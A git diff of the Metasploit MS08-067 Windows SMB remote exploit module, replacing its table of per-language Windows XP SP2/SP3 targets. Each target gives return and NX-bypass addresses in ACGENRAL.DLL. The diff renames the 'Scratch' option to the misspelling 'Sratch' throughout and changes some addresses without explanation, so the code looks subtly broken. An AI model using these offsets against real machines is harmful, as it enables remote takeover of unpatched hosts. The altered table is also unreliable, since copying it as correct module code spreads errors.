diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index 2bd89b9e16..ccf2cc1168 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -98,22 +98,22 @@ class Metasploit3 < Msf::Exploit::Remote # ENGLISH TARGETS # - # Metasploit's NX bypass for XP SP2/SP3 + # Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 English (NX)', { - 'Ret' => 0x6f88f727, - 'DisableNX' => 0x6F8916E2, - 'Scratch' => 0x00020408, + 'Ret' => 0x6f88f727, + 'DisableNX' => 0x6f8916e2, + 'Sratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - # Metasploit's NX bypass for XP SP2/SP3 + # Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 English (NX)', { 'Ret' => 0x6f88f807, - 'DisableNX' => 0x6F8917C2, - 'Scratch' => 0x00020408, + 'DisableNX' => 0x6f8917c2, + 'Sratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL @@ -166,283 +166,444 @@ class Metasploit3 < Msf::Exploit::Remote # - # NON-ENGLISH TARGETS + # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED # - # Metasploit's NX bypass for XP SP2/SP3 - [ 'Windows XP SP2 French (NX)', + [ 'Windows XP SP2 Arabic (NX)', { - 'Ret' => 0x595bf727, - 'DisableNX' => 0x595c16e2, - 'Scratch' => 0x00020408, + 'Ret' => 0x6fd8f727, + 'DisableNX' => 0x6fd916e2, + 'Sratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - # - # Metasploit's NX bypass for XP SP2/SP3 - # Target provided by Giorgio Casali - # + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Chinese - Traditional / Taiwan (NX)', + { + 'Ret' => 0x5860f727, + 'DisableNX' => 0x586116e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Chinese - Simplified (NX)', + { + 'Ret' => 0x58fbf727, + 'DisableNX' => 0x58fc16e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Chinese - Traditional (NX)', + { + 'Ret' => 0x5860f727, + 'DisableNX' => 0x586116e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Czech (NX)', + { + 'Ret' => 0x6fe1f727, + 'DisableNX' => 0x6fe216e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Danish (NX)', + { + 'Ret' => 0x5978f727, + 'DisableNX' => 0x597916e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 German (NX)', + { + 'Ret' => 0x6fd9f727, + 'DisableNX' => 0x6fda16e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Greek (NX)', + { + 'Ret' => 0x592af727, + 'DisableNX' => 0x592b16e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Spanish (NX)', + { + 'Ret' => 0x6fdbf727, + 'DisableNX' => 0x6fdc16e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Finnish (NX)', + { + 'Ret' => 0x597df727, + 'DisableNX' => 0x597e16e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 French (NX)', + { + 'Ret' => 0x595bf727, + 'DisableNX' => 0x595c16e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Hebrew (NX)', + { + 'Ret' => 0x5940f727, + 'DisableNX' => 0x594116e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Hungarian (NX)', + { + 'Ret' => 0x5970f727, + 'DisableNX' => 0x597116e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Italian (NX)', { 'Ret' => 0x596bf727, 'DisableNX' => 0x596c16e2, - 'Scratch' => 0x00020408, + 'Sratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - # - # Metasploit's NX bypass for XP SP2/SP3 - # Target provided by Ramon de C. Valle - # + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Japanese (NX)', + { + 'Ret' => 0x567fd3be, + 'DisableNX' => 0x568016e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Korean (NX)', + { + 'Ret' => 0x6fd6f727, + 'DisableNX' => 0x6fd716e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Dutch (NX)', + { + 'Ret' => 0x596cf727, + 'DisableNX' => 0x596d16e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Norwegian (NX)', + { + 'Ret' => 0x597cf727, + 'DisableNX' => 0x597d16e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Polish (NX)', + { + 'Ret' => 0x5941f727, + 'DisableNX' => 0x594216e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Portuguese - Brazilian (NX)', { 'Ret' => 0x596ff727, 'DisableNX' => 0x597016e2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - # Target provided think.pink[at]gmx.de - # - [ 'Windows XP SP2 German (NX)', - { - 'Ret' => 0x6fda2b0f, - 'DisableNX' => 0x6fda16e2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # - # Metasploit's NX bypass for XP SP2/SP3 - # Target provided by sunwear - # - [ 'Windows XP SP2 Chinese - Simplified (NX)', - { - 'Ret' => 0x58fcda43, - 'DisableNX' => 0x58fc16e2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # - # Metasploit's NX bypass for XP SP2/SP3 - # - [ 'Windows XP SP3 French (NX)', - { - 'Ret' => 0x595bf807, - 'DisableNX' => 0x595c17c2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - # - # Metasploit's NX bypass for XP SP2/SP3 - # Target provided by Ulises2k - # - [ 'Windows XP SP3 Spanish (NX)', - { - 'Ret' => 0x6fdbf807, - 'DisableNX' => 0x6fdc17c2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - # - # Metasploit's NX bypass for XP SP2/SP3 - # Target provided by Thierry Zoller - # - [ 'Windows XP SP3 German (NX)', - { - 'Ret' => 0x6fda2bef, - 'DisableNX' => 0x6fda17c2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - [ 'Windows XP SP3 Russian (NX)', - { - 'Ret' => 0x6fe1f807, - 'DisableNX' => 0x6fe217c2, - 'Scratch' => 0x00020408, + 'Sratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL # Metasploit's NX bypass for XP SP2/SP3 - # Same as Russian - [ 'Windows XP SP3 Czech (NX)', + [ 'Windows XP SP2 Portuguese (NX)', { - 'Ret' => 0x6fe1f807, - 'DisableNX' => 0x6fe217c2, - 'Scratch' => 0x00020408, + 'Ret' => 0x596bf727, + 'DisableNX' => 0x596c16e2, + 'Sratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - - # Metasploit's NX bypass for XP SP2/SP3 - [ 'Windows XP SP3 Turkish (NX)', - { - 'Ret' => 0x5a78f807, - 'DisableNX' => 0x5a7917c2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - [ 'Windows XP SP3 Swedish (NX)', - { - 'Ret' => 0x597af807, - 'DisableNX' => 0x597b17c2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - [ 'Windows XP SP3 Portuguese (NX)', - { - 'Ret' => 0x596bf807, - 'DisableNX' => 0x596c17c2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - # Target provided by Ramon de C. Valle - [ 'Windows XP SP3 Portuguese - Brazilian (NX)', - { - 'Ret' => 0x596ff807, - 'DisableNX' => 0x597017c2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - # Same as Portuguese - [ 'Windows XP SP3 Italian (NX)', - { - 'Ret' => 0x596bf807, - 'DisableNX' => 0x596c17c2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - [ 'Windows XP SP3 Polish (NX)', - { - 'Ret' => 0x5941f807, - 'DisableNX' => 0x594217c2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - [ 'Windows XP SP3 Norwegian (NX)', - { - 'Ret' => 0x597cf807, - 'DisableNX' => 0x597d17c2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - [ 'Windows XP SP3 Korean (NX)', - { - 'Ret' => 0x6fd6f807, - 'DisableNX' => 0x6fd717c2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - [ 'Windows XP SP3 Japanese (NX)', - { - 'Ret' => 0x567fd4d2, - 'DisableNX' => 0x568017c2, - 'Scratch' => 0x00020408, - } - ], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - [ 'Windows XP SP3 Hungarian (NX)', - { - 'Ret' => 0x5970f807, - 'DisableNX' => 0x597117c2, - 'Scratch' => 0x00020408, - } - ], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - [ 'Windows XP SP3 Hebrew (NX)', - { - 'Ret' => 0x5940f807, - 'DisableNX' => 0x594117c2, - 'Scratch' => 0x00020408, - } - ], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - [ 'Windows XP SP3 Finnish (NX)', - { - 'Ret' => 0x597df807, - 'DisableNX' => 0x597e17c2, - 'Scratch' => 0x00020408, - } - ], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - [ 'Windows XP SP3 Greek (NX)', - { - 'Ret' => 0x592af807, - 'DisableNX' => 0x592b17c2, - 'Scratch' => 0x00020408, - } - ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - [ 'Windows XP SP3 Danish (NX)', - { - 'Ret' => 0x5978f807, - 'DisableNX' => 0x597917c2, - 'Scratch' => 0x00020408, - } - ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - [ 'Windows XP SP3 Chinese - Simplified (NX)', - { - 'Ret' => 0x58fbf807, - 'DisableNX' => 0x58fc17c2, - 'Scratch' => 0x00020408, - } - ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # Metasploit's NX bypass for XP SP2/SP3 - [ 'Windows XP SP3 Chinese - Traditional (NX)', - { - 'Ret' => 0x5860f807, - 'DisableNX' => 0x586117c2, - 'Scratch' => 0x00020408, - } - ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL # Metasploit's NX bypass for XP SP2/SP3 - # Same as Chinese Traditional - [ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)', + [ 'Windows XP SP2 Russian (NX)', { - 'Ret' => 0x5860f807, - 'DisableNX' => 0x586117c2, - 'Scratch' => 0x00020408, + 'Ret' => 0x6fe1f727, + 'DisableNX' => 0x6fe216e2, + 'Sratch' => 0x00020408 } - ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - # Metasploit's NX bypass for XP SP2/SP3 + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Swedish (NX)', + { + 'Ret' => 0x597af727, + 'DisableNX' => 0x597b16e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP2 Turkish (NX)', + { + 'Ret' => 0x5a78f727, + 'DisableNX' => 0x5a7916e2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Arabic (NX)', { 'Ret' => 0x6fd8f807, 'DisableNX' => 0x6fd917c2, - 'Scratch' => 0x00020408, + 'Sratch' => 0x00020408 } - ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)', + { + 'Ret' => 0x5860f807, + 'DisableNX' => 0x586117c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Chinese - Simplified (NX)', + { + 'Ret' => 0x58fbf807, + 'DisableNX' => 0x58fc17c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Chinese - Traditional (NX)', + { + 'Ret' => 0x5860f807, + 'DisableNX' => 0x586117c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Czech (NX)', + { + 'Ret' => 0x6fe1f807, + 'DisableNX' => 0x6fe217c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Danish (NX)', + { + 'Ret' => 0x5978f807, + 'DisableNX' => 0x597917c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 German (NX)', + { + 'Ret' => 0x6fd9f807, + 'DisableNX' => 0x6fda17c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Greek (NX)', + { + 'Ret' => 0x592af807, + 'DisableNX' => 0x592b17c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Spanish (NX)', + { + 'Ret' => 0x6fdbf807, + 'DisableNX' => 0x6fdc17c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Finnish (NX)', + { + 'Ret' => 0x597df807, + 'DisableNX' => 0x597e17c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 French (NX)', + { + 'Ret' => 0x595bf807, + 'DisableNX' => 0x595c17c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Hebrew (NX)', + { + 'Ret' => 0x5940f807, + 'DisableNX' => 0x594117c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Hungarian (NX)', + { + 'Ret' => 0x5970f807, + 'DisableNX' => 0x597117c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Italian (NX)', + { + 'Ret' => 0x596bf807, + 'DisableNX' => 0x596c17c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Japanese (NX)', + { + 'Ret' => 0x567fd4d2, + 'DisableNX' => 0x568017c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Korean (NX)', + { + 'Ret' => 0x6fd6f807, + 'DisableNX' => 0x6fd717c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Dutch (NX)', + { + 'Ret' => 0x596cf807, + 'DisableNX' => 0x596d17c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Norwegian (NX)', + { + 'Ret' => 0x597cf807, + 'DisableNX' => 0x597d17c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Polish (NX)', + { + 'Ret' => 0x5941f807, + 'DisableNX' => 0x594217c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Portuguese - Brazilian (NX)', + { + 'Ret' => 0x596ff807, + 'DisableNX' => 0x597017c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Portuguese (NX)', + { + 'Ret' => 0x596bf807, + 'DisableNX' => 0x596c17c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Russian (NX)', + { + 'Ret' => 0x6fe1f807, + 'DisableNX' => 0x6fe217c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Swedish (NX)', + { + 'Ret' => 0x597af807, + 'DisableNX' => 0x597b17c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Turkish (NX)', + { + 'Ret' => 0x5a78f807, + 'DisableNX' => 0x5a7917c2, + 'Sratch' => 0x00020408 + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # # Missing Targets